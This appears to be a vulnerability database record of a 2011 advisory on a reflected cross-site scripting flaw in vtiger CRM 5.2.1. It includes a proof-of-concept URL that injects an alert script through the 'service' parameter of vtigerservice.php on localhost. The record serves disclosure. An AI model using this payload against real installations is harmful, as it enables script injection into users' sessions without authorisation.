ID
VAR-E-201104-1028
TITLE
vtiger CRM 5.2.1 Cross Site Scripting
Trust: 0.5
DESCRIPTION
A reflected cross site scripting vulnerability in vtiger CRM version 5.2.1 can be exploited to execute arbitrary JavaScript.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | vtiger | model: | crm | scope: | eq | version: | 5.2.1 | Trust: 0.5 |
EXPLOIT
------------------------------------------------------------------------
Software................vtiger CRM 5.2.1
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Critical (4/5)
Download................http://www.vtiger.com/
Discovery Date..........4/5/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in vtiger CRM 5.2.1 can
be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
EXPLOIT LANGUAGE
javascript
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
arbitrary, xss
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | arbitrary | Trust: 0.5 |
| tag: | javascript | Trust: 0.5 |
| tag: | xss | Trust: 0.5 |
CREDITS
AutoSec Tools
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 100183 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 100183 |
LAST UPDATE DATE
2022-07-27T10:01:21.477000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 100183 | date: | 2011-04-07T21:58:02 |